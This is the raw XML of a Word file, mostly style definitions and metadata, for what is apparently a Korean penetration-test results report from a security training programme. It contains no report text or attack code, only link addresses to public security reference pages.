    <w:name w:val="표_헤더(대) Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="af7"/>
    <w:rsid w:val="00B14512"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="굴림체" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="af8">
    <w:name w:val="본문 보고서(그 외)"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="Chara"/>
    <w:qFormat/>
    <w:rsid w:val="0016533F"/>
    <w:pPr>
      <w:snapToGrid/>
      <w:ind w:leftChars="200" w:left="200"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Chara">
    <w:name w:val="본문 보고서(그 외) Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="af8"/>
    <w:rsid w:val="0016533F"/>
    <w:rPr>
      <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs="Times New Roman"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Char">
    <w:name w:val="제목 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="a3"/>
    <w:uiPriority w:val="10"/>
    <w:rsid w:val="00AD77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9">
    <w:name w:val="Subtitle"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="Charb"/>
    <w:pPr>
      <w:pBdr>
        <w:top w:val="nil"/>
        <w:left w:val="nil"/>
        <w:bottom w:val="nil"/>
        <w:right w:val="nil"/>
        <w:between w:val="nil"/>
      </w:pBdr>
      <w:spacing w:after="60"/>
      <w:ind w:left="100" w:hanging="100"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs="맑은 고딕"/>
      <w:color w:val="000000"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Charb">
    <w:name w:val="부제 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="af9"/>
    <w:uiPriority w:val="11"/>
    <w:rsid w:val="007C3FE3"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="1">
    <w:name w:val="스타일1"/>
    <w:basedOn w:val="a8"/>
    <w:link w:val="1Char0"/>
    <w:qFormat/>
    <w:rsid w:val="004E422B"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="5"/>
      </w:numPr>
      <w:ind w:left="284" w:firstLine="0"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Char3">
    <w:name w:val="목록 단락 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="a8"/>
    <w:uiPriority w:val="34"/>
    <w:rsid w:val="00F13AA6"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Times New Roman"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="1Char0">
    <w:name w:val="스타일1 Char"/>
    <w:basedOn w:val="Char3"/>
    <w:link w:val="1"/>
    <w:rsid w:val="004E422B"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Times New Roman"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="afa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e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3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4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5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6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7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8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9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a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b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c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d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e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0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1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2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3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4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5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6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7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8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9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a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b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c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d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e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0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1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2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3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4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5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6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7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8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9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a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b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c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d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e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0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1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2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3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4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5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6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7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8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9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a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b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c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d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e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0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1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2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3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4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5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6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7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8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9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a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b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c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d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e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0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1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2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3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4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5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6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7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8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9">
    <w:basedOn w:val="TableNormal0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paragraph" w:styleId="affffffffffffa">
    <w:name w:val="No Spacing"/>
    <w:link w:val="Charc"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="00CF2593"/>
    <w:pPr>
      <w:widowControl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c">
    <w:name w:val="간격 없음 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="affffffffffffa"/>
    <w:uiPriority w:val="1"/>
    <w:rsid w:val="00CF2593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D65D1B"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:widowControl/>
      <w:numPr>
        <w:numId w:val="0"/>
      </w:numPr>
      <w:wordWrap/>
      <w:autoSpaceDE/>
      <w:autoSpaceDN/>
      <w:snapToGrid/>
      <w:spacing w:before="240" w:line="259" w:lineRule="auto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</w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="affffffffffffb">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00711024"/>
    <w:rPr>
      <w:color w:val="954F72" w:themeColor="followedHyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="20">
    <w:name w:val="스타일2"/>
    <w:basedOn w:val="2"/>
    <w:qFormat/>
    <w:rsid w:val="00A9506C"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="4"/>
      </w:numPr>
      <w:ind w:right="200"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="3">
    <w:name w:val="스타일3"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="3Char0"/>
    <w:qFormat/>
    <w:rsid w:val="007F3827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before="120"/>
      <w:ind w:left="426" w:hanging="425"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="3Char0">
    <w:name w:val="스타일3 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="3"/>
    <w:rsid w:val="007F3827"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi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90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pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet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50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hyperlink" Target="https://frida.re/docs/examples/android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alomancy.gitbook.io/guides/cheat-sheets/tunnelling-pivoting-and-proxie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80.png"/><Relationship Id="rId55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DAA5B8481F41FA82EC8487E12A5C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FDBFEBF-0651-4C37-B259-EC5129CD111A}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="00EB2F24" w:rsidRDefault="00EB2F24" w:rsidP="00EB2F24">
          <w:pPr>
            <w:pStyle w:val="3ADAA5B8481F41FA82EC8487E12A5C74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438F44F242064228AB9AFCDDE9B252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4A6819-03F8-4E97-B5C1-3CEE80E742E2}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="00EB2F24" w:rsidRDefault="00EB2F24" w:rsidP="00EB2F24">
          <w:pPr>
            <w:pStyle w:val="438F44F242064228AB9AFCDDE9B252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C3814B1BFA6746F096074165565D731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17AC2C5-FC5F-4B58-B2E2-0063B5632DB0}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="00EB2F24" w:rsidRDefault="00EB2F24" w:rsidP="00EB2F24">
          <w:pPr>
            <w:pStyle w:val="C3814B1BFA6746F096074165565D7315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24"/>
    <w:rsid w:val="00267C45"/>
    <w:rsid w:val="0055596A"/>
    <w:rsid w:val="006A5FBE"/>
    <w:rsid w:val="007078B2"/>
    <w:rsid w:val="00955A2C"/>
    <w:rsid w:val="009E1976"/>
    <w:rsid w:val="009E75BB"/>
    <w:rsid w:val="00B52099"/>
    <w:rsid w:val="00B94CD6"/>
    <w:rsid w:val="00DB0F40"/>
    <w:rsid w:val="00EA3BE6"/>
    <w:rsid w:val="00EB2F24"/>
    <w:rsid w:val="00F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DAA5B8481F41FA82EC8487E12A5C74">
    <w:name w:val="3ADAA5B8481F41FA82EC8487E12A5C74"/>
    <w:rsid w:val="00EB2F24"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:wordWrap w:val="0"/>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="438F44F242064228AB9AFCDDE9B25231">
    <w:name w:val="438F44F242064228AB9AFCDDE9B25231"/>
    <w:rsid w:val="00EB2F24"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:wordWrap w:val="0"/>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="C3814B1BFA6746F096074165565D7315">
    <w:name w:val="C3814B1BFA6746F096074165565D7315"/>
    <w:rsid w:val="00EB2F24"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:wordWrap w:val="0"/>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="87AEF4B512E04196866C47D0C681DEA6">
    <w:name w:val="87AEF4B512E04196866C47D0C681DEA6"/>
    <w:rsid w:val="00EB2F24"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:wordWrap w:val="0"/>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="7A48674D61A441DB95B59CF5A97E1045">
    <w:name w:val="7A48674D61A441DB95B59CF5A97E1045"/>
    <w:rsid w:val="00EB2F2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atS9luIOjFjz699UrmXjzIGDKQ==">CgMxLjAaJAoBMBIfCh0IB0IZCgVBcmltbxIQQXJpYWwgVW5pY29kZSBNUxolCgExEiAKHggHQhoKD1RpbWVzIE5ldyBSb21hbhIHR3VuZ3N1aBolCgEyEiAKHggHQhoKD1RpbWVzIE5ldyBSb21hbhIHR3VuZ3N1aBolCgEzEiAKHggHQhoKD1RpbWVzIE5ldyBSb21hbhIHR3VuZ3N1aBolCgE0EiAKHggHQhoKD1RpbWVzIE5ldyBSb21hbh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CE32E9-C8A4-4A9C-8B07-4D7A784F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나리오2 모의해킹결과보고서</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>SK쉴더스 루키즈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나리오2 모의해킹결과보고서</dc:title>
  <dc:subject>한끗차이</dc:subject>
  <dc:creator>r2com</dc:creator>
  <cp:lastModifiedBy>r2com</cp:lastModifiedBy>
  <cp:revision>15</cp:revision>
  <cp:lastPrinted>2024-08-01T02:17:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-08-01T02:00:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-08-01T04:48:00Z</dcterms:modified>
</cp:coreProperties>
</file>